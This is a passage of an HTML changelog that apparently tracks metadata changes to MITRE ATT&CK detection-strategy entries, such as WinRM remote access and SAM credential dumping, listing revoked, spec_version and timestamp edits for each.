black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.676000+00:00</td></tr></tbody></table></details><hr><h4>[DET0093] Behavioral Detection of User Discovery via Local and Remote Enumeration</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.667000+00:00</td></tr></tbody></table></details><hr><h4>[DET0076] Behavioral Detection of Visual Basic Execution (VBS/VBA/VBScript)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.676000+00:00</td></tr></tbody></table></details><hr><h4>[DET0464] Behavioral Detection of Wi-Fi Discovery Activity</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.690000+00:00</td></tr></tbody></table></details><hr><h4>[DET0477] Behavioral Detection of WinRM-Based Remote Access</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.683000+00:00</td></tr></tbody></table></details><hr><h4>[DET0202] Behavioral Detection of Windows Command Shell Execution</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.671000+00:00</td></tr></tbody></table></details><hr><h4>[DET0537] Behavioral detection for Supply Chain Compromise (package/update tamper → install → first-run)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.671000+00:00</td></tr></tbody></table></details><hr><h4>[DET0498] Behavior‑chain detection for T1134.003 Make and Impersonate Token (Windows)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0274] Boot or Logon Autostart Execution Detection Strategy</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.687000+00:00</td></tr></tbody></table></details><hr><h4>[DET0112] Boot or Logon Initialization Scripts Detection Strategy</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.680000+00:00</td></tr></tbody></table></details><hr><h4>[DET0463] Brute Force Authentication Failures with Multi-Platform Log Correlation</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.670000+00:00</td></tr></tbody></table></details><hr><h4>[DET0341] Clipboard Data Access with Anomalous Context</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.676000+00:00</td></tr></tbody></table></details><hr><h4>[DET0386] Cloud Account Enumeration via API, CLI, and Scripting Interfaces</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.684000+00:00</td></tr></tbody></table></details><hr><h4>[DET0309] Compromised software/update chain (installer/write → first-run/child → egress/signature anomaly)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.681000+00:00</td></tr></tbody></table></details><hr><h4>[DET0083] Container CLI and API Abuse via Docker/Kubernetes (T1059.013)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0446] Credential Access via /etc/passwd and /etc/shadow Parsing</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.671000+00:00</td></tr></tbody></table></details><hr><h4>[DET0085] Credential Dumping from SAM via Registry Dump and Local File Access</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 